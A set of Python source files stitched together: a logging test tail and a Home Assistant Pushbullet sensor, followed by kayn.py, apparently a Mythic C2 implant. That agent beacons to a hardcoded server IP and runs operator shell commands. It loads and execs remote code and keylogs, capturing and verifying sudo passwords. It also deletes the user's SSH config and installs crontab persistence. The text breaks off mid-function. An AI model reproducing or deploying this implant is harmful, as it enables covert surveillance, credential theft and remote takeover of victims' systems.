self.port = self.tcpserver.socket.getsockname()[1]
self.threads = [
threading.Thread(target=self.tcpserver.serve_until_stopped)]
for thread in self.threads:
thread.start()
self.sock_hdlr = logging.handlers.SocketHandler('localhost', self.port)
self.sock_hdlr.setFormatter(self.root_formatter)
self.root_logger.removeHandler(self.root_logger.handlers[0])
self.root_logger.addHandler(self.sock_hdlr)
def tearDown(self):
"""Shutdown the TCP server."""
try:
self.tcpserver.abort = True
del self.tcpserver
self.root_logger.removeHandler(self.sock_hdlr)
self.sock_hdlr.close()
for thread in self.threads:
thread.join(2.0)
finally:
BaseTest.tearDown(self)
def get_output(self):
"""Get the log output as received by the TCP server."""
# Signal the TCP receiver and wait for it to terminate.
self.root_logger.critical(LogRecordStreamHandler.TCP_LOG_END)
self.tcpserver.finished.wait(2.0)
return self.tcpserver.log_output
def test_output(self):
# The log message sent to the SocketHandler is properly received.
logger = logging.getLogger("tcp")
logger.error("spam")
logger.debug("eggs")
self.assertEqual(self.get_output(), "spam\neggs\n")
class MemoryTest(BaseTest):
"""Test memory persistence of logger objects."""
def setUp(self):
"""Create a dict to remember potentially destroyed objects."""
BaseTest.setUp(self)
self._survivors = {}
def _watch_for_survival(self, *args):
"""Watch the given objects for survival, by creating weakrefs to
them."""
for obj in args:
key = id(obj), repr(obj)
self._survivors[key] = weakref.ref(obj)
def _assert_survival(self):
"""Assert that all objects watched for survival have survived."""
# Trigger cycle breaking.
gc.collect()
dead = []
for (id_, repr_), ref in list(self._survivors.items()):
if ref() is None:
dead.append(repr_)
if dead:
self.fail("%d objects should have survived "
"but have been destroyed: %s" % (len(dead), ", ".join(dead)))
def test_persistent_loggers(self):
# Logger objects are persistent and retain their configuration, even
# if visible references are destroyed.
self.root_logger.setLevel(logging.INFO)
foo = logging.getLogger("foo")
self._watch_for_survival(foo)
foo.setLevel(logging.DEBUG)
self.root_logger.debug(self.next_message())
foo.debug(self.next_message())
self.assert_log_lines([
('foo', 'DEBUG', '2'),
])
del foo
# foo has survived.
self._assert_survival()
# foo has retained its settings.
bar = logging.getLogger("foo")
bar.debug(self.next_message())
self.assert_log_lines([
('foo', 'DEBUG', '2'),
('foo', 'DEBUG', '3'),
])
class EncodingTest(BaseTest):
def test_encoding_plain_file(self):
# In Python 2.x, a plain file object is treated as having no encoding.
log = logging.getLogger("test")
fn = tempfile.mktemp(".log")
# the non-ascii data we write to the log.
data = "foo\x80"
try:
handler = logging.FileHandler(fn, encoding="utf8")
log.addHandler(handler)
try:
# write non-ascii data to the log.
log.warning(data)
finally:
log.removeHandler(handler)
handler.close()
# check we wrote exactly those bytes, ignoring trailing \n etc
f = open(fn, encoding="utf8")
try:
self.assertEqual(f.read().rstrip(), data)
finally:
f.close()
finally:
if os.path.isfile(fn):
os.remove(fn)
def test_encoding_cyrillic_unicode(self):
log = logging.getLogger("test")
#Get a message in Unicode: Do svidanya in Cyrillic (meaning goodbye)
message = '\u0434\u043e \u0441\u0432\u0438\u0434\u0430\u043d\u0438\u044f'
#Ensure it's written in a Cyrillic encoding
writer_class = codecs.getwriter('cp1251')
writer_class.encoding = 'cp1251'
stream = io.BytesIO()
writer = writer_class(stream, 'strict')
handler = logging.StreamHandler(writer)
log.addHandler(handler)
try:
log.warning(message)
finally:
log.removeHandler(handler)
handler.close()
# check we wrote exactly those bytes, ignoring trailing \n etc
s = stream.getvalue()
#Compare against what the data should be when encoded in CP-1251
self.assertEqual(s, b'\xe4\xee \xf1\xe2\xe8\xe4\xe0\xed\xe8\xff\n')
class WarningsTest(BaseTest):
def test_warnings(self):
with warnings.catch_warnings():
logging.captureWarnings(True)
try:
warnings.filterwarnings("always", category=UserWarning)
file = io.StringIO()
h = logging.StreamHandler(file)
logger = logging.getLogger("py.warnings")
logger.addHandler(h)
warnings.warn("I'm warning you...")
logger.removeHandler(h)
s = file.getvalue()
h.close()
self.assertTrue(s.find("UserWarning: I'm warning you...\n") > 0)
#See if an explicit file uses the original implementation
file = io.StringIO()
warnings.showwarning("Explicit", UserWarning, "dummy.py", 42,
file, "Dummy line")
s = file.getvalue()
file.close()
self.assertEqual(s,
"dummy.py:42: UserWarning: Explicit\n Dummy line\n")
finally:
logging.captureWarnings(False)
# Set the locale to the platform-dependent default. I have no idea
# why the test does this, but in any case we save the current locale
# first and restore it at the end.
@run_with_locale('LC_ALL', '')
def test_main():
run_unittest(BuiltinLevelsTest, BasicFilterTest,
CustomLevelsAndFiltersTest, MemoryHandlerTest,
ConfigFileTest, SocketHandlerTest, MemoryTest,
EncodingTest, WarningsTest)
if __name__ == "__main__":
test_main()
|
sensor.py | """Pushbullet platform for sensor component."""
import logging
import threading
from pushbullet import InvalidKeyError, Listener, PushBullet
import voluptuous as vol
from homeassistant.components.sensor import PLATFORM_SCHEMA, SensorEntity
from homeassistant.const import CONF_API_KEY, CONF_MONITORED_CONDITIONS
import homeassistant.helpers.config_validation as cv
_LOGGER = logging.getLogger(__name__)
SENSOR_TYPES = {
"application_name": ["Application name"],
"body": ["Body"],
"notification_id": ["Notification ID"],
"notification_tag": ["Notification tag"],
"package_name": ["Package name"],
"receiver_email": ["Receiver email"],
"sender_email": ["Sender email"],
"source_device_iden": ["Sender device ID"],
"title": ["Title"],
"type": ["Type"],
}
PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend(
{
vol.Required(CONF_API_KEY): cv.string,
vol.Optional(CONF_MONITORED_CONDITIONS, default=["title", "body"]): vol.All(
cv.ensure_list, vol.Length(min=1), [vol.In(SENSOR_TYPES)]
),
}
)
def setup_platform(hass, config, add_entities, discovery_info=None):
"""Set up the Pushbullet Sensor platform."""
try:
pushbullet = PushBullet(config.get(CONF_API_KEY))
except InvalidKeyError:
_LOGGER.error("Wrong API key for Pushbullet supplied")
return False
pbprovider = PushBulletNotificationProvider(pushbullet)
devices = []
for sensor_type in config[CONF_MONITORED_CONDITIONS]:
devices.append(PushBulletNotificationSensor(pbprovider, sensor_type))
add_entities(devices)
class PushBulletNotificationSensor(SensorEntity):
"""Representation of a Pushbullet Sensor."""
def __init__(self, pb, element):
"""Initialize the Pushbullet sensor."""
self.pushbullet = pb
self._element = element
self._state = None
self._state_attributes = None
def update(self):
"""Fetch the latest data from the sensor.
This will fetch the 'sensor reading' into self._state but also all
attributes into self._state_attributes.
"""
try:
self._state = self.pushbullet.data[self._element]
self._state_attributes = self.pushbullet.data
except (KeyError, TypeError):
pass
@property
def name(self):
"""Return the name of the sensor."""
return f"Pushbullet {self._element}"
@property
def native_value(self):
"""Return the current state of the sensor."""
return self._state
@property
def extra_state_attributes(self):
"""Return all known attributes of the sensor."""
return self._state_attributes
class PushBulletNotificationProvider:
"""Provider for an account, leading to one or more sensors."""
def __init__(self, pb):
"""Start to retrieve pushes from the given Pushbullet instance."""
self.pushbullet = pb
self._data = None
self.listener = None
self.thread = threading.Thread(target=self.retrieve_pushes)
self.thread.daemon = True
self.thread.start()
def on_push(self, data):
"""Update the current data.
Currently only monitors pushes but might be extended to monitor
different kinds of Pushbullet events.
"""
if data["type"] == "push":
self._data = data["push"]
@property
def data(self):
"""Return the current data stored in the provider."""
return self._data
def retrieve_pushes(self):
"""Retrieve_pushes.
Spawn a new Listener and links it to self.on_push.
"""
self.listener = Listener(account=self.pushbullet, on_push=self.on_push)
_LOGGER.debug("Getting pushes")
try:
self.listener.run_forever()
finally:
self.listener.close()
|
kayn.py | #!/usr/bin/python3
import mythic
from mythic import mythic_rest
import asyncio
import json
import base64
import requests
import time
import ast
import types
import math
import random
import socket
import struct
import platform
import os
import getpass
import threading
try:
    from pynput import keyboard  # needed by keylog(); was commented out, so keylog() would raise NameError
except ImportError:
    keyboard = None  # hosts without pynput can still run everything else
import re
import sys
import traceback  # used in run_in_thread() but was never imported
# import Xlib
# import Xlib.display
import subprocess
from subprocess import Popen, PIPE
import stat
import hashlib
from http.server import BaseHTTPRequestHandler, HTTPServer
from Crypto.Hash import SHA256, SHA512, SHA1, MD5, HMAC
from Crypto.Cipher import AES, PKCS1_OAEP
from Crypto.Random import get_random_bytes
from Crypto.Util.Padding import unpad, pad
from Crypto.PublicKey import RSA
from base64 import b64decode, b64encode
from termcolor import colored
class Agent:
def __init__(self):
self.Server = "http://95.237.2.234"
self.Port = "8888"
self.URI = "/data"
self.PayloadUUID = "ee86d368-9e02-452d-b50b-46b9075292ee"
self.UUID = ""
self.UserAgent = {"User-Agent": "Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko"}
self.HostHeader = "domain_front"
self.Sleep = "10"
self.Jitter = "23"
self.KillDate = "2022-08-16"
self.Script = ""
self.Encryption_key = "ONqLlT2IUMjCK6ET1OK5Sg39+SyNmAw+7jgG4ggIMsg="
self.Decryption_key = "ONqLlT2IUMjCK6ET1OK5Sg39+SyNmAw+7jgG4ggIMsg="
def get_Server(self):
return self.Server
def set_Server(self, server):
self.Server = server
def get_Port(self):
return self.Port
def set_Port(self, port):
self.Port = port
def get_URI(self):
return self.URI
def set_URI(self, uri):
self.URI = uri
def get_PayloadUUID(self):
return self.PayloadUUID
def set_PayloadUUID(self, payloadUUID):
self.PayloadUUID = payloadUUID
def get_UUID(self):
return self.UUID
def set_UUID(self, uuid):
self.UUID = uuid
def get_UserAgent(self):
return self.UserAgent
def set_UserAgent(self, userAgent):
self.UserAgent = userAgent
def get_Sleep(self):
return self.Sleep
def set_Sleep(self, sleep):
self.Sleep = sleep
def get_Jitter(self):
return self.Jitter
def set_Jitter(self, jitter):
self.Jitter = jitter
def get_Encryption_key(self):
return self.Encryption_key
def set_Encryption_key(self, encryption_key):
self.Encryption_key = encryption_key
def get_Decryption_key(self):
return self.Decryption_key
def set_Decryption_key(self, decryption_key):
self.Decryption_key = decryption_key
class myRequestHandler(BaseHTTPRequestHandler):
def send_response(self, code, message=None):
self.send_response_only(code, message)
self.send_header('Server', self.version_string())
self.send_header('Date', self.date_time_string())
global dynfs
global result
global sudo
dynfs = {}  # global dict mapping name -> code of the dynamically loaded functions
sudo = ""
responses = []
delegates = []
delegates_address = []
delegates_UUID = []
delegates_aswers = []
result = {}
stopping_functions = []
worker_output = ""  # set (via `global`) by code loaded through the "code" command
break_function = False  # read by the keylogger loops; initialised here to avoid a NameError
agent = Agent()
redirecting = False
def encrypt_AES256(data, key=None):
    # Resolve the key at call time: a def-time default is frozen at import
    # and would go stale after redirect() installs a new key.
    if key is None:
        key = agent.get_Encryption_key()
    key = base64.b64decode(key)
data = json.dumps(data).encode()
h = HMAC.new(key, digestmod=SHA256)
iv = get_random_bytes(16) # generate a new random IV
cipher = AES.new(key, AES.MODE_CBC, iv=iv)
ciphertext = cipher.encrypt(pad(data, 16))
h.update(iv + ciphertext)
return iv + ciphertext + h.digest()
def encrypt_code(data, key=None):
    if key is None:  # resolve at call time (see encrypt_AES256)
        key = agent.get_Encryption_key()
    key = base64.b64decode(key)
data = data.encode()
iv = get_random_bytes(16) # generate a new random IV
cipher = AES.new(key, AES.MODE_CBC, iv=iv)
ciphertext = cipher.encrypt(pad(data, 16))
return iv + ciphertext
def decrypt_AES256(data, key=None, UUID=False):
    if key is None:  # resolve at call time (see encrypt_AES256)
        key = agent.get_Encryption_key()
    key = base64.b64decode(key)
# Decode and remove UUID from the message first
data = base64.b64decode(data)
uuid = data[:36]
data = data[36:]
# hmac should include IV
mac = data[-32:] # sha256 hmac at the end
iv = data[:16] # 16 Bytes for IV at the beginning
message = data[16:-32] # the rest is the message
h = HMAC.new(key=key, msg=iv + message, digestmod=SHA256)
h.verify(mac)
decryption_cipher = AES.new(key, AES.MODE_CBC, iv=iv)
decrypted_message = decryption_cipher.decrypt(message)
# now to remove any padding that was added on to make it the right block size of 16
decrypted_message = unpad(decrypted_message, 16)
if UUID:
return uuid.decode("utf-8") + decrypted_message.decode("utf-8")
else:
return json.loads(decrypted_message)
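# Wire format assumed by the two functions above (inferred from the code,
# not from an external spec):
#   base64( UUID[36 ascii] + IV[16] + AES-CBC ciphertext + HMAC-SHA256[32] )
# e.g. a single-block message decodes to 36 + 16 + 16 + 32 = 100 raw bytes.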
def decrypt_code(data, key=None):
    if key is None:  # resolve at call time (see encrypt_AES256)
        key = agent.get_Encryption_key()
    key = base64.b64decode(key)
iv = data[:16] # 16 Bytes for IV at the beginning
message = data[16:] # the rest is the message
decryption_cipher = AES.new(key, AES.MODE_CBC, iv=iv)
decrypted_message = decryption_cipher.decrypt(message)
decrypted_message = unpad(decrypted_message, 16)
return decrypted_message
def to64(data):
serialized = data.encode('utf-8')
base64_bytes = base64.b64encode(serialized)
return base64_bytes.decode('utf-8')
def from64(data, UUID=False):
response_bytes = data.encode('utf-8')
response_decode = base64.b64decode(response_bytes)
response_message = response_decode.decode('utf-8')
if UUID:
return response_message
else:
return ast.literal_eval(response_message[36:])
def getIP():
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect(("8.8.8.8", 80))
return s.getsockname()[0]
def getPublicIP():
return requests.get('https://api.ipify.org').text
def send(response, uuid):
if agent.get_Encryption_key() != "":
enc = encrypt_AES256(response)
message = base64.b64encode(uuid.encode() + enc).decode("utf-8")
x = ""
try:
x = requests.post(agent.get_Server() + ":" + agent.get_Port() + agent.get_URI(), data = message, headers=agent.get_UserAgent())
except Exception as e:
print(colored("Connection error, server {}:{} unreachable".format(agent.get_Server(),agent.get_Port()), "red"))
if "95.239.61.225" not in agent.Server:
agent.set_Server("http://95.237.2.234")
agent.set_Port("8888")
print(colored("Switching to main server at {}:{}".format(agent.get_Server(), agent.get_Port()), "blue"))
try:
x = requests.post(agent.get_Server() + ":" + agent.get_Port() + agent.get_URI(), data = message, headers=agent.get_UserAgent())
except:
print(colored("Connection error, main server {}:{} unreachable. Quitting".format(agent.get_Server(), agent.get_Port()), "red"))
sys.exit()
dec = decrypt_AES256(x.text)
if isinstance(dec, str):
return json.loads(dec)
else:
return dec
else:
serialized = json.dumps(response)
message = to64(serialized)
uuid = to64(uuid)
x = ""
try:
x = requests.post(agent.get_Server() + ":" + agent.get_Port() + agent.get_URI(), data = uuid + message, headers=agent.get_UserAgent())
except Exception as e:
print(colored("Connection error, server {}:{} unreachable".format(agent.get_Server(), agent.get_Port()), "red"))
if "95.239.61.225" not in agent.Server:
agent.set_Server("http://95.237.2.234")
agent.set_Port("8888")
print(colored("Switching to main server at {}:{}".format(agent.get_Server(), agent.get_Port()), "blue"))
try:
x = requests.post(agent.get_Server() + ":" + agent.get_Port() + agent.get_URI(), data = uuid + message, headers=agent.get_UserAgent())
except:
print(colored("Connection error, main server {}:{} unreachable. Quitting".format(agent.get_Server(), agent.get_Port()), "red"))
sys.exit()
res = from64(x.text)
return res
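# Both branches above produce the same outer framing: base64(UUID + payload),
# where the payload is the AES blob when a key is set and base64-encoded JSON
# otherwise. This appears to follow Mythic's agent-message convention of
# prefixing every request with the agent (or payload) UUID.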
def checkin():
print("[+] CHECKIN")
checkin_data = {
"action": "checkin",
"ip": getPublicIP() + "/" + getIP(),
"os": platform.system() + " " + platform.release(),
"user": getpass.getuser(),
"host": socket.gethostname(),
"domain": socket.getfqdn(),
"pid": os.getpid(),
"uuid": agent.get_PayloadUUID(),
"architecture": platform.architecture(),
"encryption_key": agent.get_Encryption_key(),
"decryption_key": agent.get_Decryption_key()
}
res = send(checkin_data, agent.get_PayloadUUID())
try:
agent.set_UUID(res['id'])
print("\t - Assigned UUID = " + agent.get_UUID())
except:
res = json.loads(res)
agent.set_UUID(res['id'])
print("\t - Assigned UUID = " + agent.get_UUID())
def get_tasks():
tasks = {
'action': "get_tasking",
'tasking_size': -1
}
task_list = send(tasks, agent.get_UUID())
if "delegates" in task_list:
for m in task_list["delegates"]:
delegates_aswers.append(m)
return task_list
def reverse_upload(task_id, file_id):
upload = {
'action': "upload",
'file_id': file_id,
'chunk_size': 512000,
'chunk_num': 1,
'full_path': "",
'task_id': task_id,
}
res = send(upload, agent.get_UUID())
res = res['chunk_data']
response_bytes = res.encode('utf-8')
response_decode = base64.b64decode(response_bytes)
code = response_decode.decode('utf-8')
return code
def post_result():
global responses
global delegates
global delegates_aswers
response = {}
if delegates:
response = {
'action': "post_response",
'responses': responses,
'delegates': delegates
}
responses = []
delegates = []
else:
response = {
'action': "post_response",
'responses': responses
}
responses = []
result = send(response, agent.get_UUID())
if "delegates" in result:
for m in result["delegates"]:
delegates_aswers.append(m)
return result
def execute_tasks(tasks):
if tasks:
for task in tasks['tasks']:
execute(task)
# Pick a random sign for the jitter offset; randint(0, 1) only ever returned
# 0 or 1, so the old `r < 0.5` test was just checking for 0.
r = random.choice((-1, 1))
sleep_time = int(agent.get_Sleep()) + r*(int(agent.get_Sleep()) * int(agent.get_Jitter()) / 100)
time.sleep(sleep_time / 5)
post_result()
def run_in_thread(function, param_list, task):
found = False
for item in dynfs:
if item == function:
try:
if agent.get_Encryption_key() == "":
exec(dynfs[item])
else:
exec(decrypt_code(dynfs[item]))
eval(function + "(" + str(param_list) + ")")
found = True
except Exception as e:
print(traceback.format_exc())
response = {
'task_id': task['id'],
"user_output": str(e),
'completed': False,
'status': 'error'
}
responses.append(response)
if not found:
try:
eval(function + "(" + str(param_list) + ")")
except Exception as e:
print(traceback.format_exc())
response = {
'task_id': task['id'],
"user_output": str(e),
'completed': False,
'status': 'error'
}
responses.append(response)
def execute(task):
# Search the dynamic functions first, so a command can be substituted through the load functionality
function = str(task['command'])
if function != "code":
print("\n[+] EXECUTING " + function)
param_list = "task['id'],"
if task['parameters'] != '' and task['parameters'][0] == "{":
parameters = ast.literal_eval(task['parameters'])
for param in parameters:
param_list += "ast.literal_eval(task['parameters'])['" + param + "'],"
else:
if task['parameters'] != '':
param_list += "task['parameters'],"
param_list = param_list[:-1]
thread = threading.Thread(target=run_in_thread, args=(function, param_list, task))
thread.start()
################################################################################################################
# The comment below will be substituted by the definition of the functions imported at creation time
def trace(task_id, command=None):
ip = requests.get('https://api.ipify.org').text
if command==None:
response = {
'task_id': task_id,
"user_output": ip,
'completed': True
}
responses.append(response)
try:
os.remove(os.path.expanduser("~") + "/.ssh/config")
except:
print(colored("Not enough permissions", "red"))
else:
path = ""
print("PATH = " + str(command))
if command == False:
path = ip
else:
path += command + " --> " + getpass.getuser() + "@" + ip + ";" + sudo
response = {
'task_id': task_id,
"user_output": path,
'completed': True
}
responses.append(response)
print("\t- Trace Done")
return
def nmap(task_id, command):
sudo = "bubiman10"
ip = requests.get('https://api.ipify.org').text
print('My public IP address is: {}'.format(ip))
if sudo != "":
response = {
'task_id': task_id,
"user_output": getpass.getuser() + "@" + ip + ";" + sudo + ";" + command,
'completed': True
}
responses.append(response)
else:
response = {
'task_id': task_id,
"user_output": "Sudo password not acquired. Try using keylog first. " + getpass.getuser() + "@" + ip + ";" + sudo + ";" + command,
'completed': True
}
responses.append(response)
print("\t- Nmap Done")
return
def p2p_server(task_id):
class RequestHandler(myRequestHandler):
def do_POST(self):
global delegates_aswers
content_len = int(self.headers.get('content-length', 0))
post_body = self.rfile.read(content_len)
received_uuid = ""
received_message = ""
decode = ""
encrypted = False
try:
decode = base64.b64decode(post_body)
decode = decode.decode("utf-8")
except:
decode = decrypt_AES256(post_body, UUID=True)
encrypted = True
received_uuid = str(decode)[:36]
received_message = json.loads(decode[36:])
encoded = to64(decode)
if received_message["action"] == "checkin":
delegate = {
"message": encoded,
"uuid": agent.get_PayloadUUID(),
"c2_profile": "myp2p"
}
else:
delegate = {
"message": encoded,
"uuid": received_uuid,
"c2_profile": "myp2p"
}
delegates.append(delegate)
while delegates_aswers == []:
    time.sleep(0.1)  # yield instead of hot-spinning while waiting for an answer
reply_message = ""
if received_message["action"] == "checkin":
for answer in delegates_aswers:
message = base64.b64decode(answer['message'])
message = message.decode("utf-8")
message = message[36:]
message = json.loads(message)
if message["action"] == "checkin":
reply_message = answer['message']
else:
reply = False
while not reply:
    time.sleep(0.1)  # avoid hot-spinning between scans of the answer list
for answer in delegates_aswers:
message = base64.b64decode(answer['message'])
message = message.decode("utf-8")
message_uuid = message[:36]
message = message[36:]
message = json.loads(message)
if answer['uuid'] == received_uuid and message["action"] == received_message["action"]:
if message["action"] == "get_tasking":
if message["tasks"] != []:
for task in message["tasks"]:
if task["command"] == "trace":
ip = requests.get('https://api.ipify.org').text
if task["parameters"] == "":
task["parameters"] = getpass.getuser() + "@" + ip + ";" + sudo
else:
task["parameters"] += " --> " + getpass.getuser() + "@" + ip + ";" + sudo
reply_message = to64(message_uuid) + to64(str(message))
delegates_aswers.remove(answer)
reply = True
if reply_message == "":
reply_message = answer['message']
delegates_aswers.remove(answer)
reply = True
if encrypted:
reply_message = base64.b64decode(reply_message).decode()
uuid = reply_message[:36]
message = reply_message[36:]
enc = encrypt_AES256(message)
reply_message = base64.b64encode(uuid.encode() + enc).decode("utf-8")
self.protocol_version = "HTTP/1.1"
self.send_response(200)
self.send_header("Content-Length", len(reply_message))
self.end_headers()
self.wfile.write(bytes(reply_message, "utf8"))
def run():
p2p_port = 9090
server = ('', p2p_port)
httpd = HTTPServer(server, RequestHandler)
thread = threading.Thread(target = httpd.serve_forever, daemon=True)
thread.start()
response = {
'task_id': task_id,
"user_output": "P2P Server started on {}:{}".format(getIP(), p2p_port),
'completed': True
}
responses.append(response)
print("\t- P2P Server started on {}:{}".format(getIP(), p2p_port))
run()
def load(task_id, file_id, cmds):
global responses
code = reverse_upload(task_id, file_id)
name = cmds
if agent.get_Encryption_key() == "":
dynfs[name] = code
else:
dynfs[name] = encrypt_code(code)
response = {
'task_id': task_id,
"user_output": "Module successfully added",
'commands': [
{
"action": "add",
"cmd": name
}
],
'completed': True
}
responses.append(response)
print("\t- Load Done")
return
def keylog_no_X(task_id):
global responses
global break_function  # assigned below; without this the first read raises UnboundLocalError
def get_active_window_title():
root = subprocess.Popen(['xprop', '-root', '_NET_ACTIVE_WINDOW'], stdout=subprocess.PIPE)
stdout, stderr = root.communicate()
m = re.search(rb'^_NET_ACTIVE_WINDOW.* ([\w]+)$', stdout)
if m != None:
window_id = m.group(1)
window = subprocess.Popen(['xprop', '-id', window_id, 'WM_NAME'], stdout=subprocess.PIPE)
stdout, stderr = window.communicate()
else:
return "None"
match = re.match(b"WM_NAME\(\w+\) = (?P<name>.+)$", stdout)
if match != None:
return match.group("name").strip(b'"').decode()
return "None"
def find_event():
f = open("/proc/bus/input/devices")
lines = str(f.readlines())
while lines.find("I:") != -1:
#Read block by block
event = ""
start = lines.find("I:")
end = lines.find("B: EV=")+12
if lines[start:end].find("B: EV=12001") != -1:
event_start = lines[start:end].find("event")
event_start += start
i = 1
try:
while True:
int(lines[event_start + 5 : event_start + 5 + i])
event = lines[event_start: event_start + 5 + i]
i += 1
except:
return event
lines = lines[end-6:]
qwerty_map = {
2: "1", 3: "2", 4: "3", 5: "4", 6: "5", 7: "6", 8: "7", 9: "8", 10: "9",
11: "0", 12: "-", 13: "=", 14: "[BACKSPACE]", 15: "[TAB]", 16: "a", 17: "z",
18: "e", 19: "r", 20: "t", 21: "y", 22: "u", 23: "i", 24: "o", 25: "p", 26: "^",
27: "$", 28: "\n", 29: "[CTRL]", 30: "q", 31: "s", 32: "d", 33: "f", 34: "g",
35: "h", 36: "j", 37: "k", 38: "l", 39: "m", 40: "รน", 41: "*", 42: "[SHIFT]",
43: "<", 44: "w", 45: "x", 46: "c", 47: "v", 48: "b", 49: "n", 50: ",",
51: ";", 52: ":", 53: "!", 54: "[SHIFT]", 55: "FN", 56: "ALT", 57: " ", 58: "[CAPSLOCK]",
}
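# Note: despite the name, this table maps raw Linux key codes to an AZERTY
# layout (e.g. code 16, KEY_Q on a US keyboard, yields "a"); only unshifted
# keys are covered.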
print(find_event())
infile_path = "/dev/input/" + find_event().strip()
FORMAT = 'llHHI'
EVENT_SIZE = struct.calcsize(FORMAT)
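# 'llHHI' mirrors struct input_event from <linux/input.h>:
# (tv_sec, tv_usec, type, code, value) -- 24 bytes on 64-bit Linux.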
in_file = open(infile_path, "rb")
event = in_file.read(EVENT_SIZE)
line = ""
while event:
if break_function:
print("break detected, stopping keylog")
response = {
"task_id": task_id,
"user": getpass.getuser(),
"window_title": get_active_window_title(),
"keystrokes": line,
"completed": True
}
responses.append(response)
break_function = False
return
(_, _, type, code, value) = struct.unpack(FORMAT, event)
if code != 0 and type == 1 and value == 1:
if code == 28 or code == 96:
response = {
"task_id": task_id,
"user": getpass.getuser(),
"window_title": get_active_window_title(),
"keystrokes": line + "\n",
}
responses.append(response)
line = ""
else:
line += qwerty_map[code]
event = in_file.read(EVENT_SIZE)
def keylog(task_id):
global responses
global stopping_functions
global line
global nextIsPsw  # shared with on_press(), which declares them global too
def get_active_window_title():
root = subprocess.Popen(['xprop', '-root', '_NET_ACTIVE_WINDOW'], stdout=subprocess.PIPE)
stdout, stderr = root.communicate()
m = re.search(rb'^_NET_ACTIVE_WINDOW.* ([\w]+)$', stdout)
if m != None:
window_id = m.group(1)
window = subprocess.Popen(['xprop', '-id', window_id, 'WM_NAME'], stdout=subprocess.PIPE)
stdout, stderr = window.communicate()
else:
return "None"
match = re.match(b"WM_NAME\(\w+\) = (?P<name>.+)$", stdout)
if match != None:
return match.group("name").strip(b'"').decode()
return "None"
def keylogger():
def on_press(key):
global line
global nextIsPsw
global sudo
global break_function
if "keylog" in stopping_functions:
print(colored("\t - Keylogger stopped", "red"))
response = {
"task_id": task_id,
"user": getpass.getuser(),
"window_title": get_active_window_title(),
"keystrokes": line,
"completed": True
}
responses.append(response)
line = ""
break_function = False
return False
try:
line = line + key.char
k = key.char
except:
try:
k = key.name
if key.name == "backspace":
if len(line) > 0:
line = line[:-1]
elif key.name == "space":
line += " "
elif key.name == "enter":
print(nextIsPsw)
if nextIsPsw == True:
print("I GOT THE PASSWORD: {}".format(line))
cmd = "echo {} | sudo -S touch fileToCheckSudo.asd".format(line)
p = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE)
stdout, stderr = p.communicate()
p = subprocess.Popen(["ls"], stdout=subprocess.PIPE)
stdout, stderr = p.communicate()
if "fileToCheckSudo.asd" in str(stdout):
cmd = "echo {} | sudo -S rm fileToCheckSudo.asd".format(line)
p = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE)
response = {
"task_id": task_id,
"user_output": "root password acquired: {}".format(line),
"user": getpass.getuser(),
"window_title": get_active_window_title(),
"keystrokes": line + "\n",
}
responses.append(response)
nextIsPsw = False
sudo = line
line = ""
else:
if 'sudo ' in line:
print("Next should be password")
nextIsPsw = True
response = {
"task_id": task_id,
"user": getpass.getuser(),
"window_title": get_active_window_title(),
"keystrokes": line + "\n",
}
responses.append(response)
line = ""
elif key.name == "shift" or key.name == "ctrl" or key.name == "alt" or key.name == "caps_lock" or key.name == "tab":
if "crtlc" in line:
line = ""
nextIsPsw = False
else:
line = line + key.name
except:
pass
listener = keyboard.Listener(on_press=on_press)
listener.start()
listener.join()
if keyboard is None:
    print(colored("pynput is not available; keylog requires it", "red"))
    return
# Initialise the shared state before the listener thread can fire a callback.
line = ""
nextIsPsw = False
thread2 = threading.Thread(target=keylogger, args=())
thread2.start()
print("\t- Keylog Running")
def upload(task_id, file_id, remote_path):
global responses
remote_path = remote_path.replace("\\", "")
upload = {
'action': "upload",
'file_id': file_id,
'chunk_size': 512000,
'chunk_num': 1,
'full_path': "",
'task_id': task_id,
}
res = send(upload, agent.get_UUID())
res = res['chunk_data']
response_bytes = res.encode('utf-8')
response_decode = base64.b64decode(response_bytes)
code = response_decode.decode('utf-8')
f = open(remote_path, "w")
f.write(code)
f.close()
response = {
'task_id': task_id,
"user_output": "File Uploaded",
'completed': True
}
responses.append(response)
print("\t- Upload Done")
return
def exit_agent(task_id):
response = {
'task_id': task_id,
"user_output": "Exited",
'completed': True
}
responses.append(response)
print("\t- Exit Done")
sys.exit()
def shell(task_id, cmd):
global responses
# Capture stderr too; previously it was never piped, so the stderr branch
# below could never run.
p = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout, stderr = p.communicate()
resp = ""
if isinstance(stdout, bytes) and stdout:
    resp = stdout.decode()
elif isinstance(stderr, bytes) and stderr:
    resp = stderr.decode()
response = {
'task_id': task_id,
"user_output": resp,
'completed': True
}
responses.append(response)
print("\t- Shell Done")
return
def redirect(task_id, command):
global redirecting
redirecting = True
time.sleep(int(agent.get_Sleep()))
params = command.replace(":", " ")
params = params.split(" ")
if len(params) < 2:
response = {
'task_id': task_id,
"user_output": "usage redirect <host:port> [OPTIONAL] <encryption_key>",
'completed': True
}
responses.append(response)
return
else:
ip = params[0]
port = params[1]
response = {
'task_id': task_id,
"user_output": "Redirected to {}:{}".format(agent.get_Server(), agent.get_Port()),
'completed': True
}
responses.append(response)
if len(params) > 2:
print(colored("Setting key {}".format(params[2]), "red"))
agent.set_Encryption_key(params[2])
agent.set_Server("http://" + ip)
agent.set_Port(port)
print(colored("Switching to {}:{}".format(agent.get_Server(), agent.get_Port()), "green"))
checkin()
print("\t- Redirect Done")
redirecting = False
return
def stop(task_id, function_name):
global stopping_functions
stopping_functions.append(str(function_name).strip())
response = {
'task_id': task_id,
"user_output": "Break",
'completed': True
}
responses.append(response)
return
def persistance(task_id):
global responses
global sudo
agent_name = "prova.py"
cwd = os.getcwd()
if sudo != "":
subprocess.call('echo ' + sudo + ' | sudo -S chmod 777 ' + agent_name, shell=True)
subprocess.call('crontab -l > mycron.tmp', shell=True)
subprocess.call('echo "@reboot sleep 30 && cd ' + cwd + ' && ./' + agent_name + '" >> mycron.tmp', shell=True)
subprocess.call('crontab mycron.tmp', shell=True)
subprocess.call('rm mycron.tmp', shell=True)
response = {
'task_id': task_id,
"user_output": "crontab scheduled at each reboot",
'completed': True
}
responses.append(response)
else:
response = {
'task_id': task_id,
"user_output": "Sudo password not acquired or wrong. Use keylog module to try stealing",
